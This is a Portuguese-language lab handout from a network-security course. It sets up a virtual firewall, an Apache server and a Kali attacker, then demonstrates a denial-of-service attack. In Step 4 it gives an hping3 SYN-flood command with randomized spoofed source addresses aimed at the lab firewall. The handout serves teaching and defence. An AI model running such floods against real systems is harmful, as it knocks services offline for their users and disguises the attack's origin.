Especializao em Segurana em Redes de Computadores

Proteo de Redes de Computadores

Prof. William D. Ferreira
wferreira7@gmail.com

Ataque de DoS com HPing

Informaes Iniciais

Este tutorial utilizar duas mquina virtuais Linux (Firewall e Servidor Web) e uma outra Kali Linux
(Atacante).
Cenrio

Passo 1:

Configurar Firewall
O Firewal necessita de duas interfaces de rede, uma NAT (eth0) e outra Host-only (eth1)
Aps a realizao do processo de boot do Firewall, digite os seguintes comandos para configurar as
suas interfaces de rede (eth0 e eth1):
$ sudo su
$ nano /etc/network/interfaces
Acrescente as linhas abaixo ao arquivo aberto:
auto eth1
iface eth1 inet static
address 10.234.51.1
netmask 255.255.255.0

Salve o arquivo e, em seguida, reinicie o Linux:

$ shutdown -r now

1/8

Especializao em Segurana em Redes de Computadores

Proteo de Redes de Computadores
Prof. William D. Ferreira
wferreira7@gmail.com

Agora, verifique se as configuraes esto corretas:

$ ifconfig
eth0

Link encap:Ethernet Endereo de HW 00:0c:29:25:22:81

inet end.: 192.168.199.147 Bcast:192.168.199.255 Masc:255.255.255.0
endereo inet6: fe80::20c:29ff:fe25:2281/64 Escopo:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Mtrica:1
pacotes RX:3893 erros:0 descartados:0 excesso:0 quadro:0
Pacotes TX:2981 erros:0 descartados:0 excesso:0 portadora:0
colises:0 txqueuelen:1000
RX bytes:2606801 (2.6 MB) TX bytes:390939 (390.9 KB)
IRQ:19 Endereo de E/S:0x2000

eth1

Link encap:Ethernet Endereo de HW 00:0c:29:25:22:8b

inet end.: 10.234.51.1 Bcast:10.234.51.255 Masc:255.255.255.0
endereo inet6: fe80::20c:29ff:fe25:228b/64 Escopo:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Mtrica:1
pacotes RX:2329 erros:0 descartados:0 excesso:0 quadro:0
Pacotes TX:3339 erros:0 descartados:0 excesso:0 portadora:0
colises:0 txqueuelen:1000
RX bytes:231897 (231.8 KB) TX bytes:2636376 (2.6 MB)
IRQ:19 Endereo de E/S:0x2080

lo

Link encap:Loopback Local

inet end.: 127.0.0.1 Masc:255.0.0.0
endereo inet6: ::1/128 Escopo:Mquina
UP LOOPBACK RUNNING MTU:65536 Mtrica:1
pacotes RX:439 erros:0 descartados:0 excesso:0 quadro:0
Pacotes TX:439 erros:0 descartados:0 excesso:0 portadora:0
colises:0 txqueuelen:0
RX bytes:61449 (61.4 KB) TX bytes:61449 (61.4 KB)

O IP 192.168.199.147 foi distribudo automaticamente pelo VMWare e poder ser diferente em

sua configurao.
Na sequncia, digite os comandos seguintes para criar um script de firewall:
$ mkdir /etc/firewall
$ nano /etc/firewall/firewall.sh
Preencha o aquivo com o contedo seguinte:
#!/bin/bash
iptables -t nat -F
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j DNAT --to-destination 10.234.51.10
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Salve o arquivo e torne o mesmo executvel atravs do comando:

$ chmod +x /etc/firewall/firewall.sh

2/8

Especializao em Segurana em Redes de Computadores

Proteo de Redes de Computadores
Prof. William D. Ferreira
wferreira7@gmail.com

Logo aps, execute o script criado:

$ /etc/firewall/firewall.sh
A fim de permitir que o script de firewall seja executado toda vez que o servidor for reiniciado
modifique o arquivo /etc/rc.local atravs dos comandos:
$ nano /etc/rc.local
Altere o aquivo aberto conforme evidenciado a seguir:
#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
/etc/firewall/firewall.sh
exit 0

Por fim, realize a instalao da ferramenta de monitoramento IPtraf:

$ apt-get install iptraf

3/8

Especializao em Segurana em Redes de Computadores

Proteo de Redes de Computadores
Prof. William D. Ferreira
wferreira7@gmail.com

Passo 2:

Configurar Servidor Web

O Servidor Web deve possuir apenas uma interface de rede Host-only.
Realize o boot na mquina e, logo aps, digite os comandos abaixo para configurar a sua interface
de rede:
$ sudo su
$ nano /etc/network/interfaces
Modifique o arquivo aberto para que fique igual ao apresentado a seguir:
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.234.51.10
netmask 255.255.255.0
gateway 10.234.51.1
dns-nameservers 8.8.8.8

Salve o arquivo e, em seguida, reinicie o Linux:

$ shutdown -r now

4/8

Especializao em Segurana em Redes de Computadores

Proteo de Redes de Computadores
Prof. William D. Ferreira
wferreira7@gmail.com

Em seguida, realize a instalao do servidor web HTTP Apache atravs dos seguintes comandos:
$ apt-get update
$ apt-get install apache2

5/8

Especializao em Segurana em Redes de Computadores

Proteo de Redes de Computadores
Prof. William D. Ferreira
wferreira7@gmail.com

Passo 3:

Testar o Acesso ao Servio

A mquina atacante (Kali Linux) deve possuir apenas uma interface de rede NAT.
Realize o boot do Kali Linux e para testar o acesso ao servio instalado no Servidor Web, digite o
IP da interface eth0 do Firewall no navegador do Kali Linux:

6/8

Especializao em Segurana em Redes de Computadores

Proteo de Redes de Computadores
Prof. William D. Ferreira
wferreira7@gmail.com

Passo 4:

Realizar Ataque de DoS

Para realizar o ataque utilizaremos a mquina Kali Linux e a ferramenta HPing3:
$ hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 5151 --flood --rand-source <IP eth0 Firewall>
Obs.:

-V modo verboso;
-c nmero de pacotes;
-d tamanho do dado;
-S SYN flag;
-w janela (default 64);
-p porta de destino (default 0);
-s porta de origem (default aleatria);
--flood enviar os pacotes o mais rapidamente possvel;
--rand-source: IP de origem dos pacotes aleatrio.

Neste ponto, v at a mquina Firewall e digite:

$ iptraf -i eth0
Observe o volume de conexes na porta 80 e os IPs de origem das mesmas.

7/8

Especializao em Segurana em Redes de Computadores

Proteo de Redes de Computadores
Prof. William D. Ferreira
wferreira7@gmail.com

Aps algum tempo depois do incio do ataque, digite o IP da interface eth0 no navegador de sua
mquina real e observe que haver negao de servio.

8/8